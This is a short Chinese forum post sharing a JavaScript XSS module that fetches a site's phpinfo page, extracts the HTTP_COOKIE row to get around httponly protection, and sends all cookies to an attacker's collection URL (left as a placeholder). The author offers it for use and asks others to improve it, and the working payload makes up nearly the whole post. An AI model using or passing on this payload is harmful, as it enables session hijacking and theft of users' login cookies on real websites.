特定情况下phpinfo获取cookie(突破)httponly

2020-04-13 00:10:05 29 1255
这个模块是之前收集的 实现 是实现了 可是有点不完善纳 有大佬给改改吗

模块代码

function createXmlHttp() {
    if (window.XMLHttpRequest) {
       xmlHttp = new XMLHttpRequest();               
    } else {
       xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
}
function getS() {
    var Url = 'PHPinfo的地址';
    createXmlHttp();
    xmlHttp.onreadystatechange = writeS;
    xmlHttp.open("GET", Url, true);
    xmlHttp.send(null);
}
function writeS() {
    if (xmlHttp.readyState == 4) {
     var x = xmlHttp.responseText.match(/<td[^<>]+?>_SERVER\["HTTP_COOKIE"\]<\/td><td[^<>]+?>([\w\W]+?)<\/td>/);
     if (x){
        var url = "自己收取cookie的地址" + x; //x 为带httponly cookie的所有cookie
        createXmlHttp();
        xmlHttp.open("GET", url, true);
        xmlHttp.send(null);  
       }   
    }
}
getS();

关于作者

评论29次

要评论?请先  登录  或  注册